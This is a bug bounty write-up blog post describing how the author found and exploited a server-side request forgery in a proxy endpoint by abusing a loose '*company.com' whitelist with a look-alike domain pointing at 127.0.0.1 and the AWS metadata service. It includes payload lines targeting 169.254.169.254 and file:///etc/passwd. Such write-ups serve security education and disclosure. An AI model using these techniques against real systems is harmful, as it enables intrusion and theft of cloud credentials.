Exploiting an SSRF: Trials and Tribulations

A Bug’z Life
A Bug’z Life
Published in
7 min readMar 3, 2020

I mostly wanted to share this post not because it’s a novel and unique attack, but to show the thought process of attacking this particular functionality, and understanding how the system works to identify what would and would not work. This post is covering an SSRF (Server Side Request Forgery) bug that was really fun to discover and exploit. It took a lot of work to figure out and to finally exploit.

The endpoint was actually sent to me to poke at by another fellow bug hunter, Ibram (after realizing we were on the same program). It was our first time collaborating, and we ended up finding quite a few things of interest. We both dug in and shared findings back and forth on how the application was behaving, which was very helpful. I did also notice this endpoint popped up several times (on about 15 subdomains) from Wayback Machine. The functionality was every bug hunter’s dream for SSRF. It was a proxy endpoint that allows for the client to provide a URL, and the server would make an HTTP request and display the response directly to the user (in HTML). The endpoint was something like https://company.com/proxy. The first thing I tried was to give it my Burp Collaborator instance to see if it would fetch my instance:

There was whitelist functionality in use here. It would only fetch hosts from a “trusted” list. I tried different company.com domains and noticed they all worked. So we were able to realize that *.company.com was allowed in this whitelist. The next thing we did was try to find any open redirect or subdomain takeover for *.company.com . This is because we wanted to either use an open redirect to redirect the trusted/allowed domain to something attacker controlled or internal, or use the subdomain takeover to serve my own content from the trusted domain.

To start trying to find these, I did some subdomain discovery for *.company.com using Findomain, then looked for live hosts using httprobe, and finally pulled back all the URLs found for those from Wayback Machine using Waybackurls. This gave me a list of a few hundred thousand URLs to search through to find an open redirect or subdomain takeover. I started with open redirects by grepping through the waybackurls output for something that could be an open redirect:grep "=http" wayback.txt . This should give output that has a query parameter with the value starting with http , indicating a URL is in that place which is great for discovering open redirects and SSRFs. We ended up finding a few open redirects quite easily! Now, back to the testing with this open redirect to point to my Burp Collaborator instance:

Unfortunately, I now found out that any redirect would result in a 302 to a default error page and not follow the redirect. I tried a few different things here, but ultimately learned redirects were not going to work as the server was simply fetching a single URL and returning the response. What I ended up realizing was that any response other than 200 made the application throw a 302 response. I hunted a bit more for subdomain takeovers, but could not find any.

My goal was finding an open redirect, but unfortunately that was no longer a viable option. Before diving deeper into the URL parser/whitelist logic, I thought to take a look at the list of subdomains I discovered earlier, and pass that through as the url parameter. The idea was that I could take the domains that didn’t resolve, or those that timed out as they were likely internally accessible, and pass it through and potentially fetch hidden content that the server has access to. I expected this to work for some of the domains, but unfortunately nothing interesting popped up. I also checked *.company.com for any DNS records that pointed to localhost or 127.0.0.1 as I could potentially use this domain for accessing internal resources as the domain is in the list of allowed domains, but points to an internally accessible service. Unfortunately, I could not find any domain that had a DNS record like this.

Now, with my options limiting, I decided to try and bypass the URL parser logic to get any URL through the whitelist. I went through just about every special/weird character, different redirect/SSRF bypass technique, and everything available in the publicly available wordlists out there, but had no luck. Any IP address or decimal encoded version would give generic errors. The parser logic seemed quite strong after this round of testing. As a result, bypassing the URL whitelist is probably not going to work, so I then decided to see if this whitelist is overly permissive.

I took this list of the top 1000 domains I found on Github and decided to pass that through the url parameter. It turns out it wasn’t as restricted as initially thought! amazonaws.com popped up as an allowed domain. For those not familiar, amazonaws.com is AWS’ domain that is tied to a lot of popular services, such as S3 and EC2, of which customers get their own unique endpoint or subdomain. Finally! I can serve my own content from my AWS resources. To test this out, I hosted an XSS HTML file on S3:

As expected, it worked! I now, as a worst case, have XSS that I can report. While XSS can be high impact in certain scenarios, this is one of those features that you just know is more vulnerable so I wanted to keep pushing. I tried a few different things such as trying to get the server to execute my HTML or JavaScript to load in iFrames or images of sensitive content, such as:

AWS Metadata Service:<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>

Local Files: <img src="file:///etc/passwd">

Unfortunately, as indicated by earlier behavior, the server was not actually executing any content on the target URL, but just fetching and returning it. Instead of uploading my content to S3, I decided to launch an EC2 instance so I could serve more dynamic content. I spun-up a quick server and wrote a few simple Flask endpoints to serve various content, perform redirects, and a couple other things. After trying to serve content/files to find more interesting things, I decided to revisit redirects. I thought maybe if I could pass-in a certain response code with the redirect, it would work. I wrote a quick Flask endpoint to accept a url and code query parameter so that I could easily iterate through every HTTP status code. I noticed that the application was caching responses from the same URL, so each URL needed to be different. It was easy enough to get past this by adding in a unique query string on each request, such as:

https://my-ec2.amazonaws.com/redirect?1&url=...&code=302

https://my-ec2.amazonaws.com/redirect?2&url=...&code=302

Again, no luck here. At this point, I was getting a bit desperate, so I tried looking for any *.amazonaws.com domain that has a DNS record pointing to localhost , 127.0.0.1 , or the Metadata service 169.254.169.254. As expected, there was no luck. After many trials and errors, I realized that when I was testing the URL parser logic, the application gave different responses if URLs are not allowed or whether the target URL just didn’t give a 200 response. I found out that the whitelist was not actually *.company.com , but it was in fact*company.com . I didn’t realize this at the time because the requests were failing, but then I remembered that it’s only because the domain doesn’t exist. So here I am, walking home, on my phone buying a domain on AWSneemacompany.com , and setting up DNS records for md.neemacompany.com to point to 169.254.169.254 and local.neemacompany.com to point to 127.0.0.1 .

By the time the domain was finally registered and the DNS records propagated, I pulled out my laptop and immediately tried to hit my DNS record pointing to the AWS metadata service and BAM!

Successful response from AWS Metadata service

Finally! I found the missing piece and as suspected, this functionality was indeed vulnerable. For those not familiar, the AWS Metadata service can be used to get temporary AWS credentials and get access to the company’s AWS environment, depending on what permissions the credentials have. I also tried my local.neemacompany.com and confirmed I could hit the localhost as well (with other internal services). Feeling accomplished, I went ahead to write and submit the report. Now, I can rest in peace for the night!

Next morning, I wake up and BAM:

Duplicate of a report from nearly a year ago! I laughed as I saw that because of all the work and testing that went into this. I almost suspected the original report didn’t show a high impact due to the fact that it hasn’t been fixed in a year, but I cannot confirm that. It is disappointing to see a good bug getting duped, but honestly in this case I was mostly happy that I was able to figure this bug out (even though I ended up losing $12 with this bug for the domain purchase). It was one of those bugs that would have drove me crazy if I never solved it, so I felt rewarding to go through this whole process as it was very fun to figure out and exploit! It was also great to collaborate with another bug hunter, Ibram, who has been finding some really awesome bugs and interesting leads in this particular target.

I hope this post of my thought process of understanding a particular bit of functionality and, finally exploiting it was enjoyable and helpful!

--

--

A Bug’z Life
A Bug’z Life

Our blog for all things security and technology related. Everything from our journey along InfoSec career path, bug bounty write-ups and more interesting stuff.